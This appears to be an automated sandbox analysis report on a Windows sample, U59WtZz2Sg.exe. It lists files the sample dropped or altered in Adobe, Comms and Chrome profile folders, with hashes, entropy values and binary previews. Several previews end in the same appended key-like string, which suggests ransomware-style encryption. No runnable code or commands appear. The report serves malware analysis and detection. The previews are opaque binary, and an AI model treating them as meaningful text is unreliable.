u.;.....vY..X............t..._Q..5d....dg..9.........`...4.o....R._.:B....Mz.....g\|n.X3...X...w..N7A..30.D..P]..{$.t../.....-....-I..t.x.y.N%1.....q.b....R.3.._.p...2.>..3.._..?z....O..h..K/..L5..uA...r...1Q........I.D..gQ.....1........dt,]2..w...,Y...b-.....aW".>G..L.w.:..w..~..]./hr...G..+......z"z1t...2...?../..>x.-.:.(..C.oB.....tlg....Q....\|....c3.w.Sn.....Br..9.fZ..l...<0../...z(.gs..i....*.I.G.`.v....X##+.....}.OU..,...nhl..Lh:.UD0

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	9900
Entropy (8bit):	7.980477452728381
Encrypted:	false
SSDEEP:	192:N9+FBYRX1RWbj0MeX0rS27G1MhYWiUTI86hN1JEcAw3iwUq:OFBG1RWP0UrSDETI86JJHAO7
MD5:	4A5008A86C7059C5C09F19E3AD79BC40
SHA1:	700AF17DEF96C5E47D92EDD42417F497AC9CBEBB
SHA-256:	7112EEDE83D22D3660EB744B64BC4A591EB7AD6D9F57BE6C2EE9B02879AC8BA9
SHA-512:	F97E14F616B4ED5FFCC29674F6A1D0F89DFDACBB0EB3C237E1C842BC1FF12FB065B7F115673D715F6696D5135237D7EE674F142D47B64DF501DA9E252EC0C8BF
Malicious:	false
Preview:	%!Ado.&v.}........{........J?..8......o.......+......KS4...r..w..pES4)....P..}b%,.?.V..F.$}.s.A..H..=Y....W..yR..T....O..1).....]xe....._Y...g....V..$....6...aE...X...u6..>.FF...!."....\.............X5}.z...i..&....~.g.FS.>B"...........{J.@."...Q.T.u...\|..d1..B.g.4.jR %.x4..W.3.\|'..."1..........\|.\...y..f.`..Z....C.o...r...oz..Z....(SNjgNMJ?...-J...q...8.%;O...M.6..S@.6..s.8.;..v....q...}..o...$....~.n......A......Z.z... ........)..RA..\|....n.vO..l..C,1........b.;..m..$,...@x!...l.\|....X+~eX`..,.G.........%.9.s.A..>8...f..3....7>..3&.1.....L.<a.7..X._W.X.............s...B?O.qc..B._.\.z..@.....m.SU..yCV.9k.....l3.T..*.xU...W.u.v.%.A..@.A..M.T...'....V...b....l.....57R........m=.A+..$.....i.mF. ..<B)0.\a"S.....t.....\|..].)..M#D.......].EX....g...CD...%..7SJ.4.2o..)..WN...=.Bi..Y&.-.~%.N)..p.8.0?]..}...5.V..)X.....8.3AG&9..:...`..a.@...XTg.1.y......^....ziC.p.@nH.E....9:$D...$t...1a...J..A....Z.G../[...{k.?.d.\.R..mL.......[.....".4.Z...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	252320
Entropy (8bit):	6.587558359470704
Encrypted:	false
SSDEEP:	3072:r+RmHTgdVjU9UC0Cl9t2k+ngUQUZ/WisHYr7Ah1bT562+WomP4+1:tUdZU93lYvdZuXGkhtT
MD5:	CA8E6F01DFA975EFD791171053E6B9CD
SHA1:	3BD444FD681566D1C24CC9F56930923E0228AF91
SHA-256:	27A55FD7ECB208CC4E6D5D84D2A66CECB88733B6E80C34D3275E1FF6FE1E56C4
SHA-512:	59A69068EF151D779FFBF8AD2D45661C54317A5C10479AA9BC82C046CFBE60CD2B75B5278A7BE01F45031FE6B6C7F068472C083BF08C249E67E814F2146CF7A6
Malicious:	false
Preview:	Adobe...-...T..A.qO.+Js.7..f..h!.J.LJ.u.T...r.5M.g..w,.G..E.P\.X..C{..G.w.`...t..^p.{x./W[...ff...)....g.....#...r.,9/.<._....:..R..5..p..........&^1......%.. .Lr....U..e#.{.....kI..j..9..+.......6.C.C....^........6....yce.X.?...?j..../.BH.f."....u..NL.AX1.C..]..3..].3...".C..{d...C<g..C.uO.B.:......A...`.!.........O....~.l..).x\a~<v\.gd.W).>x....H}....i.$%.}....~.7.....!dM\|.A..5...:...^.F..'.'....<...C].KY..4.N\|[.O._..".G.s.\|.o)..z.qM.g.{.....Z.=.T:`..d......Yf[....QM\|..5V...U...DY.5Y.G.;-{..u0U!.L.Z.$..8!.M..6Y_.m....am.is.E^h...L.....I.q.w....1Ue1....H..q2xM...C...0q....0j..o(Q.........'.x.m..m.......Q.\...C...Ij..g{t..-A....ph..#......M.....*.,$...".[..&.46q.[........x...\..s...g....<.p..^..6.\.jN...2.....8...I....M.%u.c.9i...,..`$F.....&{.7...X..J....rTl.(.v..8e;m.Ya..WP.....,.y.23}.]..5.d^?..0...}.bm....r?1Q"...l.....4....9.2.......m.......@...Q.q......3p.s...l.r.....[....X.&%....@....I..:.~b{.=c.K8..`v. x..{.....?...3D.S...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	32987
Entropy (8bit):	7.995165560800251
Encrypted:	true
SSDEEP:	768:l25ATIw57s956c9CRUeS3w+dzM+HfGfXaCFo+SB6xRbehYIq4/:l25nw57s956c8RUBzzM+/QXaCFo+91/E
MD5:	1C141C9FC705D03D9AD7B1ABC47332EB
SHA1:	8AD396FA56EFAA83B088FA8859B65CACB143C7DC
SHA-256:	887922E064A1A14AC29F1547AD8E6505BB40D45620FA6B7A7EAFAB85505DEA27
SHA-512:	2FAECAF5A172EE72C6F58E18C0FF73FA85E80686B25865F0588C34AEF3B628A1B892E72FE86B46CE7C87E1747BF1522053AB11A9CEC3E19FED17D0E80E4D1B29
Malicious:	true
Preview:	4.191si..L..z...~....Q{.."f..,...):..&...-J.K.W.......b....s..(>l...#~..G.......>.t;v.)...c}!J"(..{E+B...D.8..n.{.39..@C. ...F9..9..=...X....."...q3.7... C5..~..... u7....^..'W.._...._..>Q...)r....r.....a..r...2.qh ....h.........Q.bT....I.."..p..{H..}q.%.g.q9.[Ymd.5.Y.\|v.P.U.?.>I....'......`.K+?-.P.. .b}N..2....o...._.}. .7;h"0(...7}v7.E..r... .M..M"....4;.....Ij.\|.....[Gh..N..n..c.....G..S.d.dK.......EK.Z.;..^E.o..&.. E.s._P6p`...o..f?:}.....U..:n..40.$q.o[).@,.....s..;.~v..g...R...&.x.T.E$...8.-T......kH.z^.....Mb...:.Lq..K=.Ad...qQ.......vrS...p.3Z......}TS..yc...L@.b.....W.n..n.*........}........I...C>H.l..Ew#..jV..,...^a\L.n.gX.a.tw\..:.P.QY`...._....jV.0.%@........O...MT5.<.../.R.5..jQ.\|.?.Z....f.Fr. .)-....xL...vi....F..1.E.d.c.h..Ky......+ .=..[.u...n6(...u..9..d.....)...`.s......?10...-..Wo%...$........O.x..........j......e.CYy...........25....f......@b...L....,Z.X..3.y..w....Z.Ge.2<.v..$i)3...O#&......6.\|....qR\...w{.....

C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	932
Entropy (8bit):	7.7630039517608225
Encrypted:	false
SSDEEP:	24:UTJRiKsDQvm43faBHl5mqt8S3CRW8qia5hRVyKLbD:UpsDQx3faBH33FD
MD5:	7A2A13EBF6E38A9D3777C4B8BDBD9C09
SHA1:	5BAB8BD2AF64DB9B222999EFDF701622EA8AD705
SHA-256:	B1AC86C34F254AFD6F0D8CE83F929680E99D54C33BB26F2EB08877A985A6D93B
SHA-512:	BC51B7A336319C02D6A0C321C91DFC51C8D1E8207A7F8D88959CE43611B0E74C515B32495F7C9DDA20FEAE87FFB146FF35D9DE818041AC4EF632BC0F0AC014F0
Malicious:	false
Preview:	CPSA......$.......6...Ua1..$u...-......^.;..... .Q..Xy..7...(.(..P;..!...2c=.._...;..bI..'".v.P.?..i.}...7.p..k.iCbk2.....H..y....MU..H.YI.B.).aR..,...&L...`K.p5.I],qI.4. .i)^k.'.+..uch.f.%......vPd..j4.A.....K._?F6.5.R..NP.....,{x....pw`pe......._...'...x...C.....N(..IW.=...JsO.N..b..O..s\m..K.D.!i..4..B/y.%.t.j......r..~.t..g........;.....k.e...C\|-JF......'..<...%.....i:^P8.f...5.yO..-..S...f....Tp.IvV}.A7.b..k3....S_......E=.O..<_.\d.g........M,.e.o._.-....JI.7......Qd)f....W.z..(...o....'....8.y.).S ..&P...x..........o.4`..n}.gu......f..#...:Q.VM.j0..d2.l.EOp0\|1.....X.i[.B..SP.. ..(e.A...;..T...N..}..c...W.tAm.`.a.-Co\|~.9...,^t........p...'......eA?i.RC...@.......z...v...dF.....?.D...D..)1....N.\|..D.t.-"...$f,1..%u.p.\|.N..P.j<.Nib..4..G.{..56.{..pW4Og...Y..W.g.m....W..AZ.s"Xo....U8L...L......3...\.."K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.98112083835023
Encrypted:	false
SSDEEP:	192:ycwhlZ94azNbRvjufiSXC5K6OVLdGjasC5sdM8GPB7pASvt:yc2ZmaDSZXddGyuYPB7R
MD5:	D9E8248DCCEC145A2180F79C7440D756
SHA1:	29916A837D707F6944A292D71F256D16693305EB
SHA-256:	CF0B9EE72CC7CDBC877BCD4D13052D0E610A5D6AE9911FEF23614CAEA5EFD1D1
SHA-512:	4981E6966AD07489868C438A257EF6443A4D5863D7AD2447EA50FF90DEE234B7ADC04C12ED6305CF981AFF197AFEC74291F92C36FF2F964DAC0D1279B75F6E9D
Malicious:	false
Preview:	.......Fh.f_\|^.........3.T.+.......m............^.O.>.M?.QC....1.8.lS.2.}.aU{c%!]d..`....s6....R.5..@.B.3.(sP'hHH..s.:.J..J.-U.\.....1.....ej....8.x...fc....41...P...M[0.....#.Rx..y....f\..\>.0..8......K.3...X.....Dm..s.....9k.....o..%V.V..{.bs9...r..,i:..#[......T.3......v..%@.Z..,^.."...i..&0.A.x+.`...oK...4..mZ!....N..Ny..V9B..u...7.@.".&\.7SUh&...W.`x6.c...M.O~I........h99..(....X.h.d#..%..d....6.jD%...C{.....=j$...J._..m...)...D:..K.^..6......Nz%...Q...c..m..>e{( 6.....I.2..G...t......Zq..dv@..^..#.....z;.\tN....G8o.3<.mE.T.2.A.w.)..`.W..z8...d..+%.......L..X>...+.....<x...2!..9...m7.........d=c@..1~U.i...l..<.B....O......w..a..Rk<...........Y.h.$v,...s...@x.n.......%y9..{.....Y3...b.......gn...5.v!R.do.f8.>".d.Q......p..j_....0.....t.Dg..m.....;.E.^...`Q..Z....@.\.d.....q.F?. HvO..Y.'..@..<.. .t.,9.V....-xM5.k. ....v.....................h8z.....*M0.n......:....+.........Q,.8`$8F.g.-z!..c.Mg....d....d.2.`..+ ....,..@. <..@..~. ..,.

C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705843286483366
Encrypted:	false
SSDEEP:	3072:80ud0YPeiQj5+1wl/OJPjnEVhWsyiH1DLaFahA0AnvzKDSNpnjlcig:u0KQj5+6APjEuspGAhjAnZFjSV
MD5:	47FD992FBCF903331FC866FDC10427E9
SHA1:	152108012A2D415773EABAAC5290EDD69B932BE3
SHA-256:	EAC957E5C09CFA9230F958C731FBC47BD4BCC9EAB3C1F0185A3A53FC65D7E335
SHA-512:	EA5F8103A2977DFB22B376942B2FAA0A78B1053E6D0957102A4EAAA0CBE14DBD1D3C4AFC9B8ECE991A2B30C4C85336149FBC194795B4142886FCAD5AFE6477F1
Malicious:	false
Preview:	.......t..gGBIC..#...o...g.8{...,..O..`........ t..C.....=.}7..P`....Z.G..E...=Ps.i.;........a.o..N...(.B_]!J...O....Byef.+S\|g........t.k..f...Ze.......KG.....G.......a.:.Y~..j4T....)...T.K.P...0....M_...j.?...\|....k..e.UE8..v.23../8.K....O..P..+..].%.......0(/..w..=w.e...3......%..Y..6J....b+UC.,."...._?>...n.nc&J`.Ju.^.q...4..r....].>........z{..=[..#L.....\|.n...$oJe....T..7iO..We..NU;8.J.Z.i2y$]...z....Pt.N....^...oy........g...P...."...]..^u.#`{I..k..'+GF.C..E$.0.n..W+....XX+.#.;.........n.......h.b.x..1/..D.qq...xPd....j-!..u.$r.YV........fXz.}..q....Z:.....{r}.....8o..f....yT Wa.u.i...._\|.....;.H..EEY..[.U....T~]..N.d~=..%.mMp.;.e.j.I3I.A...u.f.e...v.%.y"Nm.F.G(I....&.N........K....R?Y<..70.p....A...X.z.x..b%.U..\.QL)O.'..n..k...........x....!}...V4...]....^.n.:,.......y.....7..jI..c....c....M.qq,.Q..G!...[1Tc.?./....r9.;m...-/.:0D,...F'..h..9...9......R....l............A.....?....uDw.T.....[..L....F....E...@-...^

C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705734697462741
Encrypted:	false
SSDEEP:	6144:G5GZp4pR9jRkYhiQG3lPcsw0oRweN39aww:eGT49jRkYgXOsk2u39av
MD5:	BCA3E15713F3FEDF8CF75B5795662AFF
SHA1:	D2396F399D600CAAD14F1F28BCB79F661E99A891
SHA-256:	4E066D20B625C274ADC9E6FBD42B65E57B8698D031C1996FC135E5A15ACE14E1
SHA-512:	11D97AE7D65FE8960525442CEA47A8E666A504914969FDDFC8E158111BD3EFD58F15DBA80FE16E6AA4700793D20166B38F87053DB643FC4290389CA32218B444
Malicious:	false
Preview:	........z.k.j.......<.r..p..NY...D..}-.2........y.Z...k...l.p.U....?t.....0.e..#....]T2X.d.)h....._$5...x....S.CCuPk...V...........B@.n..P.o....(.w..G.q......N2.m_R...............8.h..F!...d..2......y..0../.=B@.0.SI...8a...Y.B....i^Cj.b....n.....I....O..8.~.$.a....2J@F.....-n2.~.1....MH..H.5..@t..NM...61iI.A......_.)tX.....0e8<..g.c...N..w...NL.....$.r......6..Q...].N,=.......Z.&....qr...........nD.2..R../Qt...i,...\..{..'.)...X.......Y.\|.......j-f......p5Q..;......^./..C.y.>9....+WJe.W....[A..\|tz5..ZS4.n..h...E.R../.4&8w.^.6..E3...$......h.p....v3Z...PS.Z.J..6o..M].F$\....~"I....y.v.....m.....v.s...p.<....^."...[:.../...hUbo...G.}..%x....^.%.kn....Vd#....T.....n...M.d.q2.N..=_...#(.^..I=.i..).IWttPa......E..pL.....C!.....sb..d.aLP.(... .......n.W....!....r5P+....qXt-B. 5d.e..%;w...D`Be.%V:.k.I*.e.0.`..1H..c.M.(.&9.d....3Zc....x..i$..v@e...}.L...l.g3.>.Z.8.r.8R].}.%.../.../Tn....2...t.5Y...h.b.....~7/L(.m.....8f.[.4.^..z]-....'..

C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705361118460252
Encrypted:	false
SSDEEP:	3072:O4wC+rpz8dVo7lHShnZHWu92H3VEsEUK8wKGx:O4wC+rpAnqgGH3O7UlI
MD5:	C8901987DDA10AFF5F57E2B80E61BEFA
SHA1:	AF31791EF53C0F30CA0BC5B54A4FD6DA599AEA4F
SHA-256:	6740F5CACC786F9C3BAD979E3CAD476819BA119E7B3A2619D2CB56976B8EDBE0
SHA-512:	B782AD75ACB908800C3D27579CDD958FF89CEE970E6E2F5ECADBC1A9605BC9F32FA93132839A3ABD0102B2AEA5874759C08C12F3E405BDCD4E7E1400D4653449
Malicious:	false
Preview:	.......{...XA..>F\|a.!n.\|..'_a,.L....<.....2..f...<....Xp]..8.J.........a..;._..Jbj.L...\...w6+....C..$[y.qb4.....N..\Hi....q....7.vwk.T...)..HQ..p`N.........sjh.,5.B...-#...&Rh.+...;.]s7Q....Y..c.f....%.$...6..b,..B:..2...)..*....)t.D..^.f......u../._6...g.'...H^~....>....l.h.@p..Jx.=.k.%...~2...zr.1..^yDY.....!/.G..,\d.R.&H........L,...C.....>h....wK..q\$.DTc.....R....`)..w........K5QS...6=.BY..#.N@V..4.........@.....@i.....VU.....R;......+".'.I.e).v=....F...t./...R.r.y..e3........[V.j..,.c.k.e.;e...]jD+u.....?.9.Pe....E...I.T-.M.e.:..[.4..>.../.8..'..E...8w......$.f....Y..Y..i.../.c..x.w.}%./...$..7..{.....dr....lQ;y...(..U...k+.QMgB.x.~t.9Rsg.3.M..?......v.+!.w...Z...k......D..=yM4.....w.@.../.y..C...lE.$....g.D.%Ml\/NL6...I+.K.j.....7...{j+d....C..`....@.n...[.G+.T..+..l..$......(F.R3.m.y.d.3-l...)...\|...Vm?(...../4Y<{..H!..+.wr...U%D ?.>....3..g9.]Q..:..:........l.....7...x@.6...h ....]..xp.M.P..q.D-...?.".P..D2.dCV.R.;

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2323
Entropy (8bit):	7.910646689508133
Encrypted:	false
SSDEEP:	24:oqnGB0wL2yPGIIp0FiJCIhxN1DoiTsueME43ApH4pn+kXeig6aTnny8z4i03I35C:9k0WeYasYp+QxgdD4i0wicqqheBZD
MD5:	67F53C37E670F036AC5117516F249441
SHA1:	70830E9B3F1E17219BFA77CC451BF4A3632A0EE1
SHA-256:	1F6CF0BBEC0EC622854A2D77715C06EB6F9FE0B99695013BF5CA27BAA9976AB1
SHA-512:	A264816D46BBEBDAFDF494DAEBE4582BFCB0AD1C0E9E07639D6ED5389F499537DC0FEE2D4338FF945E96CD8AA528E7AF3A97EF640C7CF052F5F69CBD17738F8B
Malicious:	false
Preview:	.{.>.......-'.Z.<I..[.............m..)+...0C.~4..+......s...%...q.7.....i..H.d.....PN=X'.C....G..E6..2.+.!.....}j.n...2.pa.H..i.....\|....+.....-d.........7..".w.s..T.lh...Ai...u...x.......UA.;.....yV>m.....:.{.x8.B7.-..@.+'.&.......K......'..7...~&.w........0=.#....2G".....>.D<.1...{wDg...R...U..tv...aV]......m........-2...@.J..-.c......D=.p...m...-..U.W.s.i.,Y...w....G..'..>.Y4..Ys...K...R6..?^..[..}.rq[-........;..1..G...m...EY.u+....0......&...}N..........(].B.W.[..F.C.Rg.Dv<F..Q[QK.K?./.:.@.(m.S x...z..m...q..q....)Pf/.j.{.d.}..C.;.].>.......:J.>...D"X..Ma..M...5w3.kqwk..{.Q^A..{.JA'...#.-.8...x....e.%..E.?.v.......g.....0...a.5V.p...?{.h......k....7.'a......M.Bz. .......j.C7I.?..Kh..e&..k.y...x.-.c.,3Luq........V..j..U^.K.x$.Ppx.u.{.....<.y..lC~~..8..p.H...N..e.n.CT0..@..b...e....8.......4....`K"*d~...........E.....n..:D.`..u..k.3I.....Js#."...........y..d.S..O...Ju.&rW...Nv.H4...N...R.8.[....9e$M....+..M.K..\|.RK....

C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62FC182D-10C8.pma

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4194638
Entropy (8bit):	0.7531249128936979
Encrypted:	false
SSDEEP:	6144:mhN0OwZqvexC9fpDakU02dCMCFgEvvNjKcHfl+rvCTaHt4A:mz5wZQQmpDTU3g1lHFHoDfX
MD5:	309876A3D1246F8BC255552106DB5C5E
SHA1:	83D0272A90C0D2E26A5936CEA4E75842252F4556
SHA-256:	B0550AD95FDC88D638823A2AF1E3CCA70BD9DF14091431155E718A3535CBFE51
SHA-512:	29478349D7F8F3851DE16310C897CD5CF254C6A923E2726838A491E9E73D3DDC6A530B19456D1633DA9A30E32201858355755DC9FA58424AA18155A13116F25A
Malicious:	false
Preview:	...@.Q..W....7J...JrQ.....g....}.f...u..n\|.9.....+..^?...b.b...'....!,....H7..H....ZQ......]].......S.1.......:.q......=A...L...Q....-...X$.y.Lp...tBaX.D.....9b>.-s.x.^i.A\.Y&^JY..j.e^/.Z...w...X.MyT.h....-...\....(+.<.;ZX.`Z.\|....%....J.:I..-.k.W`..dS%6..i..p..Z.h.v'}.Z.r'.\|l.....oi.r....`yo`.....Q...l`S...U99....~.v...>?.$.2.d.....PJE...j..Dnf72zL.2P.N...?4..0....(x.k.W9:.....\|B..".+..-.. ...C..Z.....(...#._...7.xa...c.u .y.P4..b.yS.......D..+....j~D..O.b.+..,.b^./..$.....1=...H.E....h.}..dOh:.....U(..@'..X...,.#V.`..^\|.\|.......B.G_.1v.Sd.hWQK..M8q.'..H........L.j..M.Il...CO.,..{..^.;_.$.......ozh...\|`.u+.Y.@...R.@M.tq...$.......C..p......{5....~N.3..!....S......sscfL...@..'....b.P}0.A.A..`....-..'h`...\|].p.k.......*8....T.J/...Zaub^..3xp..\|......5.......\.Y........@.X....0w.z.....r.x6..7..3.x@.;.N.......\|.n..1.A..".E....D..G.\|./........Z..A>r..2...J.U.L{....c...!..7SV+(...........w.....................1. ..VvT.0.S?..Z..J.'.....

C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1048910
Entropy (8bit):	1.7685960927841093
Encrypted:	false
SSDEEP:	6144:58jsVU401ZHF4hFgIoDBUV25fT8VZO/Jkre:ejsV8zl4hFg1a2BcO/Jkre
MD5:	6CFF0E55062F4F7638762AB89A00F830
SHA1:	020262E42EFF5BF456BE03756A5EE6BF759CB451
SHA-256:	F932D64DE7BFA805C6D9B7EF3A01BC6293AA2ED2D49503DBD25BE641074443F1
SHA-512:	CB576CFE9E0FDDF87665321C9993445C9B271F9108F9869B9A21BE643976A6AC4AD8ABCEA64064E41C8432EFBB2225141009254963F0CA2EB2157D20077AB311
Malicious:	false
Preview:	...@.=..'&....[......7.s....w..;..H..@.ag....i;.F+..S.....8?..=..$\|..N...D......A.:....G.............y.1kn.&....7....!t.pO(...8.LUu ....V....b....}o.S.2$Gz........o......P...#3....,......\|....u...M.M.h..._._..$.o!.g.dt.r}.,.. .g...d..f.i...j#.w.rH.(....1.66.W..jp.B/.X;.as+5....T.......}....G.$.V....E.h6.Q ..c...T.V.....11$...[....R{.._6...?.[56q...F6..+W..o...;.[].E.@X.....8v........j0 ........It.~..../..-..9+V......U.:.....\|..(..P...5.g..w+{.G.....e.4....j.3.9pE.M..%E.....n...F.\...A.8.a#.$..\|..)l...t....%...O=.?;D../.F..a)..t...f(,..QBS.............y\|?i....Np\...!.$bW}"U..h\|.'....ifnm..st.b.?.b..7......@./nWE......DFT.C.B6....^...f..D!\.Po...Tu.Y.E.1.~$......DQ/...u..../....~#'....m).~.TN7....^=f.5/.}^s.".Q..q-...l.qY...-2A.......rb.5G..7..d..........T...<.ds.......v........{X...2!.\|.-}x.P..*G..5..d.$..q...'sr....#Y.1...x.6..[R\.f..E.5+5.+..}........f.Q.g;..3w...y....!#>..:o.....;5}...)...(.Y.ulj.e..0.F.7.s@`N..).......Z.....a..c..{K

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	374
Entropy (8bit):	7.303489315864283
Encrypted:	false
SSDEEP:	6:z/7PzLtV4cd3pDyPXBPVkSkxBytRsIEYHCp+zId8eUJRW4T184GxntHcii96Z:LztV33pDyP/kSIBeRsIEYip+fk4T18D1
MD5:	441C1FCA3F74FE2DE63B3BF2F856CC43
SHA1:	54F384EED5902FDEB173E4341936FF5412DCB826
SHA-256:	834218AB617E671E8EDA0636576DE14427AB3072BF95348B4F42352BAAF347C9
SHA-512:	FF2966A596E06D2ED383005A770E9B902141845C2CBBD4267416C87C27927EFE3DE660CE67F674D877398131CF86531523348EE473C2776B27DBA898293FA638
Malicious:	false
Preview:	sdPC.W..Ay.9.n.#},..Mb.}..-..p.....mF..#y..Q..m...^h.... ..4......)~1.N.-...e..a.@....8Te..@..FclP.C....:7...Id..w...._....W}..7.Ma...X=.Z..^u..i...E..}..L.....RC..0.......g.&.ad.....E....^.#W.".\|..d.tO.a.....n8Uw..L27P?p'.X.F0...._z...j1.....0.2...".Z...2U.3.Z....q. :H.K......~..!K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	638
Entropy (8bit):	7.660745175577223
Encrypted:	false
SSDEEP:	12:qtZYsaIcZPIXzh2PFOOjkvOFTBKSOnzv7Y7bBAwGT9h+FIzapH7WiJ0W8tcii9a:+ZsIcxZInXSNA39IIzIyitCbD
MD5:	6EFEBBD8E6C10717EE635EF5310CF427
SHA1:	099C68464506259D4CAF734A11D3F9D4E08BD3C0
SHA-256:	88FAA5C8FEBB0AAF6C09182F1D0788EC0C6D0C966AC27AA6AE0BA44848756B8B
SHA-512:	AEF5C0AF89CB567E172379FA204259614F98188F8D67C5C4575D7DEBBF8302AF9FBC578B781BC8F43D2C5DB9D894C05DAE9EAC886C0EE29EB63369808AD7B896
Malicious:	false
Preview:	.f.5..5)4K4......D[..1..v.IR.6........[.e?&.N.......r...?.''.)....jR(..z....M.k.!...n...s....O[..,....C......*...'....L......P....q..h....@&B{.lg....3.m....\...q.5...\|Rb.^.u..-u.'.x....t...+....L....X~;`M........J.&..z...S.."1.r:..F....E..If Y..&5S9.....mgJz\|./>........>&^>j.r5..........JFh..nm..G......c..aM...2.`U..V.8(......QD8\^.3.4W.N..UUj9[....b......c...Q Ka....z.tC.zg.Y...trl........o...=..n.9....m.S.t.s.T..< :.h.x..[.2Qo.Z.......(T....?g..v"l%3.)Y.\O.$.........P.u..>.).L.a.&A.._..-..d.(...^H.?F..8Z...{.f.....`..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	474
Entropy (8bit):	7.423889538166189
Encrypted:	false
SSDEEP:	12:PGRYCPiFk1jV5OLStxxoN1DW14Xu4WuRYtcii9a:PGRjH1peSfCN1DOigbD
MD5:	84C290D94F5097DA812D6337654B7C58
SHA1:	8BBFCE2C96B8AB008660065B78C686D01670D784
SHA-256:	7015780855B3E38E65F0B7A40FBD43C82EAB3E2FEAB1AE8CA9B7650DDBD0671E
SHA-512:	95124662EC0EF1E691CE7A7A78015B49ACB7B39442CD96CDB3F7F97EC2DBAB828D8EC71D25AC43A9E689BB51826624490E68ADD7EF517273196B446AD08E85BC
Malicious:	false
Preview:	2020/.n.a..OIG.d. _k$.2......3<:5.f.....jh.:.D...cO#g..&.{.XGQ.....-%...G_.~.5%F....m...t.i.D.(.>V..-.w...'...9J}Ei.B.R.yp.L.......S......x.G...../...+Jg.Q.R...J.@.eB..B..2.........f....1..3...N,s......O.-..:.[..Y4wQ..b.S.%.h/.bi.X.".....o.)...m.[..[p.........#.......c....q..b%.....\|o!..).s.f.ES...X../,3^G^...QT.E..(.;\|....Y..2.......$.i....r..`...&;.%I..0.9.....Z..F...v..J(..BK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	486
Entropy (8bit):	7.458188592526049
Encrypted:	false
SSDEEP:	12:q2bfVSXzMzVSgsa1W/KDh7yG5RX2U32LHQdcKILpkZtcii9a:BzVlVSjaWwh7P5Rv3gwdy1kbbD
MD5:	BF76F471853257785278F8FA2026C00D
SHA1:	3F685A00A9C660C2B7B6C2BC65851C714CD9C481
SHA-256:	64EC4277238FB71BC64EF6D507E550384658C5C9EF3EB4E0D88A74594E635E81
SHA-512:	53E8295280A6FC96DB1AA375822C676E9AD36DA593CE9B1A5492716FB27AA7F7230E806D589A04C0E817DE6C78B5D08D2C4B7966A6AC4BEB490F0EB10B67AD7F
Malicious:	false
Preview:	.f.5...*...V.HY.o(..........y?.....i..-..aV>Oy.v...F..k...{d.....v.y1.Ck..R.e.P.2.j.E_...4.l...3.P....X..b....a'...m.......0..~..z..;..J..#rXz...GKo..4.tP........L1%..66L.p.-..f0...q&i.w..R....\|5B.?..>..b.....D...]..\|.q.Om................S....;;e.A...DG.....md^..1a..XA%7.....}...7..Ue..q......Y..4.\|X....y...p..>..!........m.MG.:^.....q.F....K..kI....I..%.. }.;....Xc.l]..).....[..c. ..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1702
Entropy (8bit):	7.889370767975146
Encrypted:	false
